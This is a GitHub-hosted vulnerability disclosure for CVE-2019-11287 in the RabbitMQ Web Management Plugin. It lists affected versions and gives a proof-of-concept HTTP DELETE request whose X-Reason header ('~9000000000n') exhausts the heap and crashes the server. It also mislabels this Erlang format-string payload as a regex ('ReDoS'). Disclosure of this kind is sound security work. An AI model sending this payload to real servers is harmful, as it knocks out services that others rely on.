Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Disclosures/CVE-2019-11287-DoS via Heap Overflow-RabbitMQ Web Management Plugin/
Disclosures/CVE-2019-11287-DoS via Heap Overflow-RabbitMQ Web Management Plugin/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 

CVE-2019-11287: RabbitMQ Web Management Plugin DoS via Heap Overflow

Pivotal RabbitMQ, versions 3.7.x prior to 3.7.21 and 3.8.x prior to 3.8.1, and RabbitMQ for Pivotal Platform, 1.16.x versions prior to 1.16.7 and 1.17.x versions prior to 1.17.4, contain a web management plugin that is vulnerable to a denial of service attack.
The "X-Reason" HTTP Header can be leveraged to insert a malicious Erlang format string that will expand and consume the heap, resulting in the server crashing.

Affected Products Affected Versions
Pivotal RabbitMQ 3.7.x prior to 3.7.21 and 3.8.x prior to 3.8.1
RabbitMQ for Pivotal Platform 1.16.x prior to 1.16.7 and 1.17.x prior to 1.17.4

Vendor Disclosure:

The vendor's disclosure and mitigation of this vulnerability can be found here.

Requirements:

For successful exploitation of the vulnerability, the attacker will require:

  • Credentials for the Web Management Plugin (Ex. guest:guest)
  • An MQTT connection which can be "Force Closed"

Proof Of Concept:

Step 1 - AMQP connection

Initiate or wait for a AMQP connection to be established to the server

Step 2 - ReDoS

Click on the connection and insert the malicious payload in the "Reason" field, afterwards click the "Force Close" button.
In this case the payload is "~9000000000n", a regex which will try in the backend to result in generating a string containing 9000000000 new line characters.

Request

DELETE /api/connections/127.0.0.1%3A51115%20-%3E%20127.0.0.1%3A5672 HTTP/1.1
Host: 127.0.0.1:15672
content-type: application/json
authorization: Basic Z***TRUNCATED***=
X-Reason: ~9000000000n
Content-Length: 68
Cookie: m=2258:Z***TRUNCATED***=

{"name":"127.0.0.1:51115 -> 127.0.0.1:5672","reason":"~9000000000n"}

Note: Only the "X-Reason" HTTP Header is interpreted in an unsafe way by the server. The "reason" variable in the JSON payload does not affect the outcome in any way.

Result

The result of this payload is that the RabbitMQ server on 5672 and RabbitMQ Web Management Plugin on 15672 crash. The report of the crash can be found in "/var/log/rabbitmq/erl_crash.dump" and shows the misallocation of the heap.

Note: The "top" tool can be used to see the spike in CPU and Memory consumption of the RabbitMQ "beam.smp" command.